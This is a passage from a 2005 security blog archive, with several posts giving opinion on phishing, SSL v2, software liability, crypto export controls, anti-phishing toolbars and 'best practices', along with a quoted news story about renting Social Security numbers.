    Annoyingly, none of the security advisories that I saw said what should be the obvious workaround: *TURN OFF SSL V2! NOW!* It's an old protocol, it's done its job and deserves to be put out to pasture. Give it an apple a day and let it enjoy its last few years without shame.

    The presence of SSL v2 continues to embarrass us with insecurity. This security advisory is the least of worries, by far the greater effect is that with SSL v2 delivered as a default protocol, all browsers and all web servers end up negotiating SSL v2. That's because the HELLO negotiation can only cope with both v2 and v3 nodes if it assumes the first, and both nodes will then fall back to SSL v2. Maybe the security advisory should be extended to all the browsers and web servers out there?

    Meanwhile, the reason we care is not because an MITM could break into SSL v2 (fat chance of that happening) but because we can't do virtual hosts without SSL v3. This is a good solid pragmatic user and business reason and cryptoengineers, security experts and the like are not expected to understand this: Without virtual hosts, we can't spread SSL to be a *routine* protection for all web sites. And without SSL being a *routine* protection, the security model in the browser won't get fixed and phishing rampantly pillages its way through suburban america like a bad 90s music revival. Depressing, expensive and accompanied by lots of screaming and wailing when people realise their wallets just got emptied by ... well, like any revival, we don't really want to admit we know who it was by.

    Anway, the upshot is that the security advisory misses the chance to deliver any security to people. SSL remains SNAFU: Situation Normal, All F**ked Up.

    Posted by iang at 12:01 PM | Comments (0) | TrackBack

    October 07, 2005

    Blaming the Banks won't work

    Bruce Schneier outlines some of the factors behind phishing and then tries to stick it on the banks. Sorry, won't work - the Banks are victims in this too, and what's more they are not in the direct loop.

    Make Banks Responsible for Phishers

    ...
    Push the responsibility -- all of it -- for identity theft onto the financial institutions, and phishing will go away. This fraud will go away not because people will suddenly get smart and quit responding to phishing e-mails, because California has new criminal penalties for phishing, or because ISPs will recognize and delete the e-mails. It will go away because the information a criminal can get from a phishing attack won't be enough for him to commit fraud -- because the companies won't stand for all those losses.

    If there's one general precept of security policy that is universally true, it is that security works best when the entity that is in the best position to mitigate the risk is responsible for that risk. Making financial institutions responsible for losses due to phishing and identity theft is the only way to deal with the problem. And not just the direct financial losses -- they need to make it less painful to resolve identity theft issues, enabling people to truly clear their names and credit histories. Money to reimburse losses is cheap compared with the expense of redesigning their systems, but anything less won't work.

    You can't push all of the responsibility onto the FIs. Here's why:

    1. Phishing is an attack on the user primarily and only secondarily on the FI. Consider what happens: the phisher sends a request (by email) to the user to have her send her details to him (using her browser). The parts in parentheses are optional but key: phishing is an attack on the browser using email to deliver the phish. We can more or less change the email to chat or SMS for example, but it is harder to change the browser component.

    What's constant about all those issues is that the banks aren't in that primary loop as yet. So even if they have all the responsibility they are strictly limited in how they tell the user to "not do that."

    2. FIs aren't the only target of phishing. Amazon and eBay are both big targets. So any attempt to stick it to the banks is just going to shift the attention to all sorts of other areas. Expect Amazon and every other merchant to prefer not to have that happen.

    3. If you want to stick it to anyone, go looking for where this came from. The banks picked up this security model from somewhere. Here's where: the browser security model that was built on a miscast threat analysis, the server security model that was subject to big company's agendas, and the client security model which is simply best described as "Insecurity by Microsoft." All of these elements are broken, in the security jargon.

    If you want someone to blame for phishing in the wider sense, look to who pushed the tech (Microsoft, three times over. RSADSI, Verisign, Netscape for the browser security model. For server side, Sun, IBM, and thousands of security experts who said that as long as you buy our firewall you'll be OK. And don't forget whoever audited these systems and said they were secure. Yes, you four, or is it three... you know who I'm talking about.)

    Ask this long list of beneficiaries how much liability *they* have for a breach. The answer may surprise: Nix, zip, nada, zilch. Zero in all currencies. So if you stick it to the banks, guess who's next on the list?

    4. Taking a risk truism and extending it to a particular case is dangerous. It may be that security works best when those in the best position take on responsibility for those risks they can best mitigate. And it's clear that the banks are the larger party here and well capable of doing something to address phishing.

    But if you put *all* the responsibility onto one party, not only do you have a measurement problem, you'll also have a moral hazard problem. Users will then shop and hook with gay abandon. How are banks supposed to keep up with attacks by both users and phishers? Turn off online banking is the only answer I can think of.

    Posted by iang at 11:37 AM | Comments (5) | TrackBack

    October 06, 2005

    Security Software faces rising barriers

    Signs abound that it is becoming more difficult to do basic security and stay clean oneself. An indictment for selling software was issued in the US, and this opens up the pandora's box of what is reasonable behaviour in writing and selling.

    Can writing software be a crime? By Mark Rasch, SecurityFocus (MarkRasch at solutionary.com) Published Tuesday 4th October 2005 10:05 GMT

    Can writing software be a crime? A recent indictment in San Diego, California indicates that the answer to that question may be yes. We all know that launching certain types of malicious code - viruses, worms, Trojans, even spyware or sending out spam - may violate the law. But on July 21, 2005 a federal grand jury in the Southern District of California indicted 25 year old Carlos Enrique Perez-Melara for writing, advertising and selling a computer program called "Loverspy," a key logging program designed to allow users to capture keystrokes of any computer onto which it is installed. The indictment raises a host of questions about the criminalization of code, and the rights of privacy for users of the Internet and computers in general.

    We all might agree that what the defendent is doing is distasteful at some level, but the real danger here is that what is created as a precedent against key loggers will be used against other things. Check your local security software package list, and mark about half of them for badness at some level. I'd this is as so inevitable that any attention paid to the case itself ("we need to stop this!") is somewhere between ignorance and willful blindness.

    On a similar front, recall the crypto regulations that US security authors struggle under. My view is that the US government's continuing cryptopogrom feeds eventually into the US weakness against cyber threats, so they've only themselves to blame. Which might be ok for them, but as software without crypto also effects the general strength of the Internet at large, it's yet another case of society at large v. USG. Poking around over on PRZ's xFone site I found yet another development that will hamper US security producers from securing themselves and us:

    Downloading the Prototype

    Since announcing this project at the Black Hat conference, a lot of people have been asking to download the prototype just to play with it, even though I warned them it was not a real product yet. In order to make it available for download, I must take care of a few details regarding export controls. After years of struggle in the 1990's, we finally prevailed in our efforts to get the US Government to drop the export controls in 2000. However, there are still some residual export controls in place, namely, to prevent the software from being exported to a few embargoed nations-- Cuba, Iran, Libya, North Korea, Sudan, and Syria. And there are now requirements to check customers against government watch lists as well, which is something that companies such as PGP have to comply with these days. I will have to have my server do these checks before allowing a download to proceed. It will take some time to work out the details on how to do this, and it's turning out to be more complicated than it first appeared.

    (My emphasis.) Shipping security software now needs to check against a customer list as well? Especially one as bogus as the flying-while-arab list? Phil is well used to being at the bleeding edge of the crypto distribution business, so his commentary indicates that the situation exists, and he expects to be pursued on any bureaucratic fronts that might exist. Another sign of increasing cryptoparanoia:

    The proposal by the Defense Department covers "deemed" exports. According to the Commerce Department, "An export of technology or source code (except encryption source code) is 'deemed' to take place when it is released to a foreign national within the United States."

    The Pentagon wants to tighten restrictions on deemed exports to restrict the flow of technical knowledge to potential enemies.

    A further issue that has given me much thought is the suggestion by some that security people should not break any laws in doing their work. I saw an article a few days back on Lynn's list (was lost now found), that described how the FBI cooperates with security workers who commit illegal or questionable acts in chasing bad guys, in this case extortionists in Russia (this para heavily rewritten now that I've found the article):

    The N.H.T.C.U. has never explicitly credited Prolexic’s engineers with Maksakov’s arrest. “The identification of the offenders in this came about through a number of lines of inquiry,” Deats said. “Prolexic’s was one of them, but not the only one.” In retrospect, Lyon said, “The N.H.T.C.U. and the F.B.I. were kind of using us. The agents aren’t allowed to do an Nmap, a port scan”—techniques that he and Dayton Turner had used to find Ivan’s zombies. “It’s not illegal; it’s just a little intrusive. And then we had to yank the zombie software off a computer, and the F.B.I. turned a blind eye to that. They kind of said, ‘We can’t tell you to do that—we can’t even suggest it. But if that data were to come to us we wouldn’t complain.’ We could do things outside of their jurisdiction.” He added that although his company still maintained relationships with law-enforcement agencies, they had grown more cautious about accepting help.

    What a contrast to the view that security workers should never commit a "federal offence" in doing their work.

    I find the whole debate surrealistic as the laws that create these offences are so broad and sweeping that it is not clear to me that a security person can do any job without breaking some laws; or is this just another sign that most security people are more bureaucrats than thinkers? I recently observed a case where in order to find some security hardware, a techie ran a portscan on a local net and hard-crashed the very equipment he was looking for. In the ensuing hue and cry over the crashed equipment (I never heard if they ever recovered the poor stricken device...), the voice that was heard loudest was that "he shouldn't be doing that!" The voice that went almost unheard was that the equipment wasn't resiliant enough to do the job of securing the facility if it fell over when a mere port scan hit it.

    Barriers are rising in the security business. Which is precisely the wrong thing to do; security is mostly a bottom-up activity, and making it difficult for the small players and the techies at the coalface will reduce overall security for all. The puzzling thing is why other people do not see that; why we have to go through the pain of Sarbanes-Oxley, expensive CA models, suits against small software manufacturers, putting software tool-makers and crypto protocol designers in jail and the like in order to discover that inflexible rules and blind bureaucracy have only a limited place to play in security.

    Addendum: Security consultant convicted for ... wait for it: doing due diligence on a charity site in case it was a scam!

    Posted by iang at 08:44 AM | Comments (3) | TrackBack

    September 29, 2005

    Microsoft, Office SP2, anti-phishing, security patches, the real situation, and the arms race.

    In security pennies, Microsoft released SP2 for Office with some attention to phishing:

    The most noteworthy enhancement is the addition of a new Phishing Protection feature to Outlook 2003's Junk E-mail Filter. This feature will be turned on by default for users who have Office 2003 SP2 and the latest Outlook 2003 Junk E-mail Filter Update, the company said.

    To which I say the most noteworthy thing is that either the press or Microsoft thought that anti-phishing is the most important thing. Yet, to me, a Junk email filter improvement that picks up phishing emails is so underwhelming that I hesitate with embarressment to ask this question: why is it that big browser companies like Mozilla and Microsoft think that they can address phishing at the email level by expanding their bayesian filters?

    Any comments out there? What am I missing?

    There are security enhancements in the SP2 pack, but as one wit had it: "Cool! Now ... will it work?" The security disaster continues:

    A new report from the Information Security Forum (ISF) warns that Trojan-based attacks are becoming more sophisticated and harder to stop. The ISF - a not-for-profit organisation with 260 members including half of the Fortune 100 - believes this sophisication will see Trojans soon take over from email phishing. But, it warns, phishing is still big business - more than a third of ISF members have been affected by phishing attacks.

    Yes, this is the well known conclusion. Trojans can take over the Microsoft Windows computer and do the lifting of account information without the user having to do *anything*. Once there was enough finance developed in the early clumsy email phishing model to invest in virus/trojan based attacks, this move was inevitable.

    What does this mean? The underground shift that the press dare not speak of will firm up, and the decade(s) long domination of Microsoft Windows will end, I predict. People never had a real reason to shift from Microsoft computers before, but nobody was stealing their money before. Long term view: sell Microsoft, buy Apple.

    Jean sends this snippet entitled An 'arms race' no one can stop, and it speaks to the general security view:

    Periodic attacks against computers by vandals, terrorists, and allegedly by governments such as that of China, have raised cyber-security to the top of the computer community's agenda.

    Computer experts warn. National security officials sound alarm. Banks clamor. The press writes sensational stories. And the public seems fascinated by the exotically named and poorly understood threats. Everybody, it seems, agrees that cyber security needs to be beefed up.

    Today indeed there may be a deficit of computer security. But it seems inevitable that tomorrow we will have too much of it. How can there be too much security? Security tends to prevent bad things from happening. But it also prevents some good things from emerging.

    Some cyber-security makes private and societal sense, of course. Backup file systems, decentralisation, firewalls, password, all of these are reasonable measures. But since they do not stop determined intruders, the tendency is for increased security measures.

    How much should a company spend for its computer security? Total security is neither achievable nor affordable. Instead, a company would engage in some form of cost-benefit analysis, in which it compares the cost of harm avoidance with the benefit of such reduced harm.

    But in the real world, the data for such calculation is systematically skewed in the direction of exaggerated harm and understated cost of prevention. Take the cost of harm.
    ...

    So more than a few people have recognised that we've been spending big and talking big on security for the last decade or so and it's now getting worse. What's the misconnection here? That is indeed a topic of current research, but at least it has started to enter the radar screens of security thinkers.

    Posted by iang at 06:01 AM | Comments (1) | TrackBack

    September 16, 2005

    PayPal protected with Trustbar and Petnames

    Here's how your Paypal browsing can be protected with Trustbar:

    Apologies for the huge image! Notice the extra little window that has "PayPal, Inc" in it. That's a label that indicates that you have selected this site as one of your trusted ones. You can go even further and type in your own label such as "Internet money" or "How I Pay For Things" in which case it will turn green as a further indicator that you're in control.

    This label of yours is called a petname, and indicates that Trustbar has found the certificate that you've labelled as PayPal. And, as that's the certificate used to secure the connection, it is really your Paypal you are talking to, not some other bogus one.

    Trustbar also allows you to assign logos to your favourite sites. These logos allow you to recognise more quickly than words which site you are at. (Scribblers note: there are more screen shots at Trustbar's new help page.)

    These are simple powerful ideas and the best we have at the moment for phishing. You can do the same thing with the Petname toolbar which just implements the own-label part. It's smaller, neater, and works on more platforms such as OSX and FreeBSD, but is not as powerful.

    One thing that both of these tools rely heavily upon is SSL. That's because the SSL certificate is the way they know that it's really the site - if you take away the certificate then there is no way to be sure, and we know that the phishers are generally smart enough to trick any maybes that might be relied upon.

    Trustbar allows you to assign a name to a site that hasn't SSL protection - but Petnames does not. In this sense, Trustbar says that most attacks occur outside SSL and we should protect against the majorit of attacks, whereas Petnames draws a line in the sand - the site must be using SSL and must be using a certificate in order to make reliable statements. Both of these are valid security statements, and will eventually converge over time.


    For security insiders, Philipp posts news of a recent phishing survey. I've skimmed it briefly and it puts heady evidence on the claim that phishing is now institutionalised. Worth a visit!

    The Economy of Phishing: A survey of the operations of the phishing market

    Christopher Abad

    Abstract:
    Phishing has been defined as the fraudulent acquisition of personal information by tricking an individual into believing the attacker is a trustworthy entity. Phishing attacks are becoming more sophisticated and are on the rise. In order to develop effective strategies and solutions to combat the phishing problem, one needs to understand the infrastructure in which phishing economies thrive.

    We have conducted extensive research to uncover phishing networks. The result is detailed analysis from 3,900,000 phishing e-mails, 220,000 messages collected from 13 key phishing-related chat rooms, 13,000 chat rooms and 48,000 users, which were spidered across six chat networks and 4,400 compromised hosts used in botnets.

    This paper presents the findings from this research as well as an analysis of the phishing infrastructure.


    Closing notes. This page I am updating as new info comes in.

    nother note for journalists: over at the Anti-fraud mailing list Anti-Fraud Coffee Room you can find the independent researchers who are building tools based on the nature of the attack, not the current flavour of the month.

    Posted by iang at 09:35 AM | Comments (1) | TrackBack

    August 31, 2005

    The HR Malaise in Britain - 25% of CVs are fiction

    As discussed here a while back in depth, there is an increasing Human Resources problem in some countries. Here's actual testing of the scope of the issue whereby job employers ask for people to lie to them in the interview, and jobseekers happily oblige:

    One CV in four is a work of fiction

    By Sarah Womack, Social Affairs Correspondent (Filed: 19/08/2005)

    One in four people lies on their CV, says a study that partly blames the "laxity" of employers.

    The average jobseeker tells three lies but some employees admitted making up more than half their career history.

    A report this month from The Chartered Institute of Personnel and Development highlights the problem. It says nearly a quarter of companies admitted not always taking up candidates' references and a similar percentage routinely failed to check absenteeism records or qualifications.

    Example snipped...

    The institute said that the fact that a rising number of public sector staff lie about
    qualifications or give false references was a problem not just for health services and charities, where staff could be working with vulnerable adults or children, but many public services.

    The institute said a quarter of employers surveyed ''had to withdraw at least one job offer. Others discover too late that they have employed a liar who is not competent to do the job."

    Research by Mori in 2001 showed that 7.5 million of Britain's 25.3 million workers had misled potential employers. The figure covered all ages and management levels.

    The institute puts the cost to employers at £1 billion.

    © Copyright of Telegraph Group Limited 2005.

    If it found 25% of the workers admitted to making material misrepresentations, that shows it is not an abnormality, rather lying to get a job is normal. Certainly I'd expect similar results in computing and banking (private) sectors, and before you get too smug over the pond, I'd say if anything the problem is worse in the US of A.

    There is no point in commenting further than to point to this earlier essay: Lies, Uncertainty and Job Interviews. I wonder if it had any effect?

    Posted by iang at 10:47 AM | Comments (0) | TrackBack

    August 28, 2005

    Microsoft to release 'Phishing Filter'

    It looks like Microsoft are about to release their anti-phishing (first mooted months ago here):

    WASHINGTON _ Microsoft Corp. will soon release a security tool for its Internet browser that privacy advocates say could allow the company to track the surfing habits of computer users. Microsoft officials say the company has no intention of doing so.

    The new feature, which Microsoft will make available as a free download within the next few weeks, is prompting some controversy, as it will inform the company of Web sites that users are visiting.

    The browser tool is being called a "Phishing Filter." It is designed to warn computer users about "phishing," an online identity theft scam. The Federal Trade Commission estimates that about 10 million Americans were victims of identity theft in 2005, costing the economy $52.6 billion dollars.

    What follows in that article is lots of criticsm. I actually agree with that criticism but in the wider picture, it is more important for Microsoft to weigh into the fight than to get it right. We have a crying need to focus the problem on what it is - the failure of security tools and the security infrastructure that Microsoft and other companies (RSADSI, VeriSign, CAs, Mozilla, Opera...) are peddling.

    Microsoft by dint of the fact that they are the only large player taking phishing seriously are now the leaders in security thinking. They need to win some I guess.

    (Meanwhile, I've reinstated the security top tips on the blog, by popular demand. These tips are designed for ordinary users. They are so brief that even ordinary users should be able to comprehend - without needing further reference. And, they are as comprehensive as I can get them. Try them on your mother and let me know...)

    Posted by iang at 06:19 AM | Comments (0) | TrackBack

    August 20, 2005

    Notes on security defences

    Adam points to a great idea by EFF and Tor:

    Tor is a decentralized network of computers on the Internet that increases privacy in Web browsing, instant messaging, and other applications. We estimate there are some 50,000 Tor users currently, routing their traffic through about 250 volunteer Tor servers on five continents. However, Tor's current user interface approach — running as a service in the background — does a poor job of communicating network status and security levels to the user.

    The Tor project, affiliated with the Electronic Frontier Foundation, is running a UI contest to develop a vision of how Tor can work in a user's everyday anonymous browsing experience. Some of the challenges include how to make alerts and error conditions visible on screen; how to let the user configure Tor to use or avoid certain routes or nodes; how to learn about the current state of a Tor connection, including which servers it uses; and how to find out whether (and which) applications are using Tor safely.

    This is a great idea!

    User interfaces is one of our biggest challenges in security, alongside the the challenge of shifting mental models from no-risk cryptography across to opportunistic cryptography. We've all seen how incomplete UIs can drain a project's lifeblood, and we all should know by now just how expensive it is to create a nice one. I wish them well. Of the judges, Adam was part of the Freedom project which was a commercial forerunner for Tor (I guess) and is a long time privacy / security hacker. Ping runs Usable Security - the nexus between UIs and secure coding. (The others I do not know.)

    In other good stuff, Brad Templeton was spotted by FM carrying on the good fight against the evils of no-risk cryptography (1, 2, 3). Unfortunately there is no blog to point at but the debate echoes what was posted here on Skype many moons back.

    The mistakes that the defender, SS, makes are routine. 1. confused threat models in the normal fashion: because we can identify one person on the planet who needs ultimate, top notch security, then we can assert that all people need this. (c.f., airbags and human rights workers. Pah.) 2, confused user needs model, again normal. The needs of a corporation to sell to fee-paying clients is completely disjoint from the needs of the Internet user. The absence of concern for the Internet's security at systemic levels in place of the need to sell product is the mess we have to clean up today. E.g., "There is an abundance of encryption in use today where it's needed." should be read as "Cryptography should be everywhere where we can sell it, and is dangerous elsewhere." 3. Ye Olde Mythe of security-by-obscurity results in a false sense of security. In practice, security-by-sales has led to a much greater and thus falser false sense of security, and is part and parcel of the massive security mess we face now. 4. because opportunistic cryptography so challenges the world view of old timers and commercial security providers, they have a lot of trouble being scientific about it and often feel they are being attacked personally. This means they are unable to contribute to the debate about phishing, malware and the like, as they are still blocked on selling the very model that brought about these ills. Every time they get close to discovering how these frauds come about, they have to reject the logic that points at the solution as the problem.

    Breaking through this barrier, getting people to think scientifically and use cryptography to benefit has proven to be the hardest thing! But the meme might be starting to take hold. Scanning Ping's blog, it seems he has been pushing the idea of a competition for some time:

    The best I’ve been able to come up with so far is this:
    Hold yearly competitive user studies in which teams compete to design secure user interfaces and develop attacks against other teams’ user interfaces. Evaluate the submissions by testing on a large group of users.

    And this logic is in direct response to the discord between what users will use and what security practitioners will secure. (And, note that Brad Templeton, Jedi noted above, is apparently the chair of the EFF running this competition.)

    Ping asks is there any other way? Yes, I believe so. If you are mild of heart, or are not firmly relaxed, stop reading now.

    <ContoversyAlert>

    The ideal security solution is built with no security at all. Only later, after the model has been proven as actually sustainable in an economic fashion, should security be added.

    And then, only slowly, and only in ways that attempt not to change or limit the user's ability. The only reason to take away usability from the users is if the system is performing so badly it is in danger of collapse.

    </ControversyAlert>

    This model is at the core of the successful security systems we generally talk about. Credit cards worked this way, adding security hacks little by little as fraud rates rise. Indeed, the times something really truly secure was added, it either flopped (smart cards were rejected) or backfired (SSL led to phishing).

    To switch sides and maintain the same point :-) just-in-time cryptography is how the web was secured! First HTTP was designed, and then a bandaid was added. (Well, actually TLS is more of a plaster cast where a bandaid should have been used, but the point remains valid, and bidirectional.)

    Same with SSH - first Telnet proved the model, then it was replaced by SSH. PGP came later than email and secured it after email was proven. WEP is adequate for wireless in strength but is too hard to turn on so it has failed to impress. Why it is too hard to turn on is because it was built too securely, perversely.

    Digital cash never succeeded - and I suggest it is in part because it was designed to be secure from the ground up. In contrast look at Paypal and the gold currencies. Basically, they are account money with that SSL-coloured plaster cast slapped on. (They succeeded, and note that the gold currencies were also the first to treat and defeat phishing on a mass scale.)

    So, over to you! We already know this is an outrageous claim. The question is why is JIT crypto so close to reality? How real is it? Why is it that everything we've practiced as a discipline has failed, or only worked by accident?

    (See also Security Usability with Peter Gutmann.)

    August 11, 2005

    Is Security Compatible with Commerciality?

    A debate has erupted over the blogspace where some security insiders (Tao, EC)are saying that there is real serious exploit code sitting there waiting to be used, but "if we told you where, we'd have to kill you."

    This is an age old dilemma. The outsiders (Spire) say, "tell us what it is, or we believe you are simply making it up." Or, in more serious negotiating form, "tell us where or you're buying the beers."

    I have to agree with that point of view as I've seen the excuse used far too many times, from security to finance to war plans. Both inside and outside. In my experience, when I do find out the truth, the person who made the statement was more often wrong than right, or the situation was badly read, and nowhere near representative.

    Then, of course, people say that they have no choice because they are under NDA. Well, we all need to eat, don't we? And we need to maintain faith and reputation for our next job, so the logic goes.

    This is a trickier one. Again, I have my reservations. If a situation is a real security risk, then what ever happened to the ethics of a security professional? Are we saying that it's A-OK to claim that one is a security professional, but anything covered by an NDA doesn't count? Or that when a company operates under NDA, it's permitted to conduct practices that would ordinarily be deemed insecure?

    Fundamentally, an NDA switches your entire practices from whatever you believed you were before to an agent of the company. That's the point. So you are now under the company's agenda - and if the company is not interested in security then you are no longer interested in security, even if the job is chief security blah blah. Is that harsh? Not really, most security companies are strictly interested in selling whatever sells, and they'll sell an inadequate or insecure tool with a pretty security label with no problem whatsoever. Find us a company that withdrew an insecure tool and said it was no longer serving users, and we might have a debate on this one.

    At the minimum, once you've signed an NDA, you can't go around purporting to have a public opinion on issues such as disclosure if you won't disclose the things you know yourself. Or, maybe, if you chose to participate in the security practices covered under NDA, you are effectively condoning this as a security practice, so you really are making it all up as you go. So in a sense, the only value to these comments is simply as an advert for your "insideness," like the HR people used to mention as a deal breaker.

    It is for these reasons that I prefer security to be conducted out in the open - conflicts like these tend to be dealt with. I've written before about how secret security policies are inevitably perverted to other agendas, and I am now wondering whether the forces of anti-security are wider than that, even.

    It may be that it is simply incompatible to do security in a closed corporate environment.

    Consider the last company you worked at where security was under NDA - was it really secure? Consider the last secure operating system you used - was it one of the closed ones, or one of the free open source implementations with a rabid and angry security forum? Was security just window dressing because customers liked that look, ticked that box?

    Recent moves towards commercialism (by two open organisations in the browser field) seem to confirm this; the more they get closer to the commercial model, the more security baby gets thrown out with the bath water.

    What do you think? Is it possible to do security in a closed environment? And how is that done? No BS please - leave out the hype vendors. Who seriously delivers security in a closed environment? And how do they overcome the conflicts?

    Or, can't you say because of the NDA?

    Posted by iang at 06:20 PM | Comments (6) | TrackBack

    July 08, 2005

    Liability for Software - is the end of the Security Industry a bad thing or a good thing?

    I've been thinking about software liability a bit and just the other day had a bit of a revelation. If security software came with liability it would destroy the security industry. That's the good news :-) The bad news is that we'd also get some regulation to boot, which would slow things down, as Marcus Ranum points out (by way of Eric Marvets).

    My revelation occurred like this. In the closing stages of a small security job for a friend, I discovered that the intellectual property was being handled with a handshake. This didn't worry me from a property point of view simply because the <1000 lines of code written weren't worth enough to argue about, it was the process and knowledge that was being charged for.

    But the absence of a proper transfer contract did worry me from a liability point of view. So I wrote in that there was zero liability. And the discussions started ... it was during that discussion with the client that I realised that the reason I had written zero liability - and left the client high and dry to fend with what could well have been buggy, incomplete, snake-oil nonsense written by a script kiddie, for all the client knows - was that if there was any liability, the price would have to go up.

    And, significantly! The price would sky rocket because the mere presence of a letter from a lawyer would probably wipe out not only the profits from the job but the entire revenues (quick reality check, ask your lawyer what their retainer would be for a software liability action).

    So we - me as supplier, the client as user, and the entire industry - are faced with a choice. Either supply the product at price X and go with zero liability, or supply the product at price Y and assume some liability.

    What's the ratio between X and Y? For me it was at least double. Probably more like 3-4 times. It's so significant that I know the client wouldn't pay so they only have one choice: either they pay for no liability and get the security, or they don't get the security work done at all.

    So what would happen if liability were added to software? Marcus suggests Microsoft Windows would go to $1000 per copy, citing the medical industry's experience. It's a number!

    Clearly Microsoft Windows would go up in price. Just as clearly, people would switch to open source product, which cannot as easily carry liability because there is no _for consideration_ contract, and their $1000 laptop would stay a $1000 laptop [1, 2]. And, as it happens, the secure Operating Systems are the BSDs so not only will they suddenly find more popularity, we'd get more security into the bargain as well as more people start to use these products, probably via the hard route of Linux, which would be also forced to get serious about security.

    This of course is the argument of the liability people - make software cope with its insecurity by properly pricing the cost of security such that it more correctly allocates society's resources. With the added wrinkle of open source of course. The problem with taking this path is that, no matter how desirable you find the notion of supporting open source, subsidies are a net 'bad' as an assumption in economics. That is, most every theory and study in economics shows that subsidies cost society more than they make. Which is to say that letting the market find the way to produce secure software is still a better bet than installing a permanent subsidy for open source into place.

    This market process may already be on the move, says Eric Marvets:

    [Microsoft's] marketing department is quietly getting ready and now all that's left is for the product to hit the market. These may all be coincidences, but I think it's a masterfully crafted business plan mid-execution.

    Microsoft is rejigging everything in place for a shift to a more security-oriented focus (quietly...).

    Will it work? Who knows. But one thing is clear - the market is pushing Microsoft in the direction of further security. What we need is happening, in the market. The question of whether regulators can do better is really a tough one, and experience and theory says No. So in promoting why adding liability would improve our net security, the question to ask is why it would work this time when the combined weight of economics and experience is against it?

    1. Open source suppliers can carry liability, but lets ignore the edge cases here.
    2. Countries with poorly developed intellectual property laws would still use Windows, as they also don't enter into contracts for consideration.

    Posted by iang at 09:56 AM | Comments (1) | TrackBack

    June 10, 2005

    New Best Practice for security: Avoid "Best Practices"

    I've written long and critically (including in a draft paper) how "best practices" may actually oppose security rather than support it. Yes, there is a model that explains why best practices is bad. It appears that others may be coming to the same conclusion; here's a few snippets in that direction.

    1. "Best fit" is better fit. An otherwise routine article by Tan Shong Ye (Partner and Head of Security & Technology Practice at PricewaterhouseCoopers) suggests:

    It is becoming more common for organisations to strive for a "best fit" solution, as opposed to obtaining "best practice" in every security-related matter. Conforming to a set of best practices can be an extremely expensive exercise that does not necessarily deliver business benefits equal to or greater than the resources expended to get there.

    A best-fit model is, instead, about understanding what the risks are and applying the most appropriate risk mitigation strategy to reduce them, as opposed to applying best practice processes regardless of the associated risk.

    2. Write your passwords down! Another "best practices" looks like it is leaving us. Signs are that companies are finally starting to recommend that passwords be written down. Thank heavens for that. Slashdot reports that Netgear and Microsoft are doing it, they must have seen the blog (look at #4 to the right).

    Writing passwords down is common sense. If you have a dozen passwords, how elsewise are you going to remember them? And what happens when you don't remember them? You can't use the system! Which means admin time, help desk support time, your time, and sometimes your opportunity costs all kick in.

    Writing passwords down was banned back in the days when we each had one password only so we should be able to remember it. And, it helps to remember that the problem wasn't writing them down, it was pinning them to the very machine itself with big letters saying ACCOUNT PASSWORD ...

    All people have to do is hide it from view. That's all. Back in the days when I was a systems administrator I would carefully and obviously take all the root passwords, write them down on a piece of paper, put the paper into an envelope and seal it. Also sign all over the back. Finally I would pin the envelope on the boss's notice board where anyone could get it.

    I'd do this obviously and blatently so that everyone in the office knew where to get them. And then I'd check every week to make sure it hadn't been opened.

    3. Don't outsource your soul to big companies. Smaller companies bemoan how large companies only buy from large security suppliers. Obviously, large security suppliers get stuck in large ruts. Buying from a large safe company may be a way to avoid having to learn the real risks, but it doesn't mean that you've covered those risks...

    4. And finally, Security is now the #1 concern of Financial Executives. So pay attention!

    Posted by iang at 05:57 PM | Comments (6) | TrackBack

    Virus-safe Computing - HP Labs article

    Mark Miller reports on a nice easy article from HP Labs. A must read!



    Check out the current cover story on the HP Labs web page!

    (For archival purposes, I also include here a direct link to Virus-safe computing.)

    Research on how to do safe operating systems is concentrated in the capabilities field, and this article worth reading to get the flavour. The big challenge is to how to get capabilities thought into the mainstream product area, and the way the team has chosen to concentrate on securing Microsoft Windows programs has to be admired for the chutzpah!

    Allegedlly, they've done it, at least in lab conditions. Can they take the capabilities and POLA approach and put it into the production world? I don't know but the research is right up there at the top of the 'watch' list.

    Posted by iang at 08:01 AM | Comments (0) | TrackBack

    June 07, 2005

    Identity is an asset. Assets mean theft ... and Trade!

    This is a good article. It describes what happens when you make a simple number the core of your security system. If you control the number, it becomes valuable. If it becomes valuable then it will either be stolen or traded. Valuable things are assets - which means trade or theft. (See also EC.)

    In this case we we see the trade, and this sits nicely alongside the identity theft epidemic in the US: all there because the system made the number the control.

    All security is based on assets. Perversely, if you make a number the core of your security system, then it becomes an asset, thus adding one more thing to protect, so you need a security system to secure your security system.

    The lesson is simple. Do not make your security depend on a number. Identify what the asset is and protect that. Don't protect stuff that isn't relevent, elsewise you'll find that the costs of protecting might skyrocket, while your asset walks off unprotected.


    Some Immigrants Are Offering Social Security Numbers for Rent
    By EDUARDO PORTER

    Published: June 7, 2005

    TLALCHAPA, Mexico - Gerardo Luviano is looking for somebody to rent his Social Security number.

    Mr. Luviano, 39, obtained legal residence in the United States almost 20 years ago. But these days, back in Mexico, teaching beekeeping at the local high school in this hot, dusty town in the southwestern part of the country, Mr. Luviano is not using his Social Security number. So he is looking for an illegal immigrant in the United States to use it for him - providing a little cash along the way.

    "I've almost managed to contact somebody to lend my number to," Mr. Luviano said. "My brother in California has a friend who has crops and has people that need one."

    Mr. Luviano's pending transaction is merely a blip in a shadowy yet vibrant underground market. Virtually undetected by American authorities, operating below the radar in immigrant communities from coast to coast, a secondary trade in identities has emerged straddling both sides of the Mexico-United States border.

    "It is seen as a normal thing to do," said Luis Magana, an immigrant-rights activist assisting farm workers in the agriculture-rich San Joaquin Valley of California.

    The number of people participating in the illegal deals is impossible to determine accurately. But it is clearly significant, flourishing despite efforts to combat identity fraud.

    Hundreds of thousands of immigrants who cross the border from Mexico illegally each year need to procure a legal identity that will allow them to work in the United States. Many legal immigrants, whether living in the United States or back in Mexico, are happy to provide them: as they pad their earnings by letting illegal immigrants work under their name and number, they also enhance their own unemployment and pension benefits. And sometimes they charge for the favor.

    Martin Mora, a former migrant to the United States who these days is a local politician preparing to run for a seat in the state legislature in next October's elections, said that in just one town in the Tlalchapa municipality, "of about 1,000 that fixed their papers in the United States there might be 50 that are here and lending their number."

    Demand for American identities has blossomed in the cracks between the nation's increasingly unwelcoming immigration laws and businesses' unremitting demand for low-wage labor.

    In 1986, when the Immigration Reform and Control Act started penalizing employers who knowingly hired illegal immigrants, most employers started requiring immigrants to provide the paperwork - including a Social Security number - to prove their eligibility to work.

    The new law did not stop unauthorized immigrant work. An estimated 10 million illegal immigrants live in the United States today, up from some 4 million before the law went into effect. But it did create a thriving market for fake documents.

